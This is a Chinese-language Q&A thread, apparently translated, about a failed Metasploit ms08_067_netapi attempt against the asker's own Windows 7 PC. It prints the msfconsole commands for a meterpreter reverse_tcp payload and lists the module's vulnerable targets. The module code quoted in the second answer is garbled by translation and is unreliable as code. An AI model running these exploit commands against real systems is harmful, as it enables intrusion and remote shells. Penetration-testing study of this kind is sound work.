Metasploit框架(kali )的问题[ms08_067_netapi]

Question

我对kali linux很陌生，一般只是渗透测试。我在进入我自己的个人电脑的metasploit框架上遇到了一些麻烦。我使用了本教程，得到了一个错误，上面写着“由于没有目标而中止了利用漏洞”，但是我提供了一个目标。下面是我使用过的命令和错误的列表。

    msf > use windows/smb/ms08_067_netapi
    msf exploit(ms08_067_netapi) > set payload windows/meterpreter/reverse_tcp
    payload => windows/meterpreter/reverse_tcp

    msf exploit(ms08_067_netapi) > set lhost 192.168.0.104
    lhost => 192.168.0.104

    msf exploit(ms08_067_netapi) > set rhost 192.168.0.105
    rhost => 192.168.0.105

    msf exploit(ms08_067_netapi) > set lport 4444
    lport => 4444

    msf exploit(ms08_067_netapi) > set rport 445
    rport => 445

    msf exploit(ms08_067_netapi) > exploit

    [*] Started reverse TCP handler on 192.168.0.104:4444 
    [*] Automatically detecting the target...
    [*] Fingerprint: Windows 7 - Service Pack 1 - lang:Unknown
    [*] We could not detect the language pack, defaulting to English
    [-] Exploit aborted due to failure: no-target: No matching target
    [*] Exploit completed, but no session was created. 

更新这里是“显示选项”的输出

    Module options (exploit/windows/smb/ms08_067_netapi):

       Name     Current Setting  Required  Description
       ----     ---------------  --------  -----------
       RHOST    192.168.0.105    yes       The target address
       RPORT    445              yes       Set the SMB service port
       SMBPIPE  BROWSER          yes       The pipe name to use (BROWSER, SRVSVC)


    Payload options (windows/meterpreter/reverse_tcp):

       Name      Current Setting  Required  Description
       ----      ---------------  --------  -----------
       EXITFUNC  thread           yes       Exit technique (Accepted: '', seh, thread, process, none)
       LHOST     192.168.0.104    yes       The listen address
       LPORT     4444             yes       The listen port


    Exploit target:

       Id  Name
       --  ----
       0   Automatic Targeting

Answer 1

Windows 7 SP1不应易受ms08_067攻击。您可以通过show targets命令查看metasploit支持的目标。这是我卡利盒子上的清单：

Exploit targets:

   Id  Name
   --  ----
   0   Automatic Targeting
   1   Windows 2000 Universal
   2   Windows XP SP0/SP1 Universal
   3   Windows 2003 SP0 Universal
   4   Windows XP SP2 English (AlwaysOn NX)
   5   Windows XP SP2 English (NX)
   6   Windows XP SP3 English (AlwaysOn NX)
   7   Windows XP SP3 English (NX)
   8   Windows XP SP2 Arabic (NX)
   9   Windows XP SP2 Chinese - Traditional / Taiwan (NX)
   10  Windows XP SP2 Chinese - Simplified (NX)
   11  Windows XP SP2 Chinese - Traditional (NX)
   12  Windows XP SP2 Czech (NX)
   13  Windows XP SP2 Danish (NX)
   14  Windows XP SP2 German (NX)
   15  Windows XP SP2 Greek (NX)
   16  Windows XP SP2 Spanish (NX)
   17  Windows XP SP2 Finnish (NX)
   18  Windows XP SP2 French (NX)
   19  Windows XP SP2 Hebrew (NX)
   20  Windows XP SP2 Hungarian (NX)
   21  Windows XP SP2 Italian (NX)
   22  Windows XP SP2 Japanese (NX)
   23  Windows XP SP2 Korean (NX)
   24  Windows XP SP2 Dutch (NX)
   25  Windows XP SP2 Norwegian (NX)
   26  Windows XP SP2 Polish (NX)
   27  Windows XP SP2 Portuguese - Brazilian (NX)
   28  Windows XP SP2 Portuguese (NX)
   29  Windows XP SP2 Russian (NX)
   30  Windows XP SP2 Swedish (NX)
   31  Windows XP SP2 Turkish (NX)
   32  Windows XP SP3 Arabic (NX)
   33  Windows XP SP3 Chinese - Traditional / Taiwan (NX)
   34  Windows XP SP3 Chinese - Simplified (NX)
   35  Windows XP SP3 Chinese - Traditional (NX)
   36  Windows XP SP3 Czech (NX)
   37  Windows XP SP3 Danish (NX)
   38  Windows XP SP3 German (NX)
   39  Windows XP SP3 Greek (NX)
   40  Windows XP SP3 Spanish (NX)
   41  Windows XP SP3 Finnish (NX)
   42  Windows XP SP3 French (NX)
   43  Windows XP SP3 Hebrew (NX)
   44  Windows XP SP3 Hungarian (NX)
   45  Windows XP SP3 Italian (NX)
   46  Windows XP SP3 Japanese (NX)
   47  Windows XP SP3 Korean (NX)
   48  Windows XP SP3 Dutch (NX)
   49  Windows XP SP3 Norwegian (NX)
   50  Windows XP SP3 Polish (NX)
   51  Windows XP SP3 Portuguese - Brazilian (NX)
   52  Windows XP SP3 Portuguese (NX)
   53  Windows XP SP3 Russian (NX)
   54  Windows XP SP3 Swedish (NX)
   55  Windows XP SP3 Turkish (NX)
   56  Windows 2003 SP1 English (NO NX)
   57  Windows 2003 SP1 English (NX)
   58  Windows 2003 SP1 Japanese (NO NX)
   59  Windows 2003 SP1 Spanish (NO NX)
   60  Windows 2003 SP1 Spanish (NX)
   61  Windows 2003 SP1 French (NO NX)
   62  Windows 2003 SP1 French (NX)
   63  Windows 2003 SP2 English (NO NX)
   64  Windows 2003 SP2 English (NX)
   65  Windows 2003 SP2 German (NO NX)
   66  Windows 2003 SP2 German (NX)
   67  Windows 2003 SP2 Portuguese - Brazilian (NX)
   68  Windows 2003 SP2 Spanish (NO NX)
   69  Windows 2003 SP2 Spanish (NX)
   70  Windows 2003 SP2 Japanese (NO NX)
   71  Windows 2003 SP2 French (NO NX)
   72  Windows 2003 SP2 French (NX)

Answer 2

Windows 7不会像前面提到的这里那样容易受到此漏洞的攻击。此漏洞仅适用于代码中提到的目标。通过使用该漏洞代码，您只可以看到Windows 2003和windows。

看看代码片段，它返回终端上显示的错误消息。您可以看到github上的代码以及这里

Print_status(自动检测目标.)fprint = smb_fingerprint print_status(“指纹：#{fprint“‘os’”} - #{fprint“sp”} - lang:#{fprint“朗”}") #在未知操作系统上(fprint“‘os’” ==‘未知’)fail_with(Failure:NoTarget，‘无匹配目标’)结束。

在这里，您可以看到当未检测到利用此漏洞所需的OS版本时，它将返回“未找到匹配的目标”错误消息。因此，要利用此漏洞，受害者应该正在运行Windows XP或Windows 2003。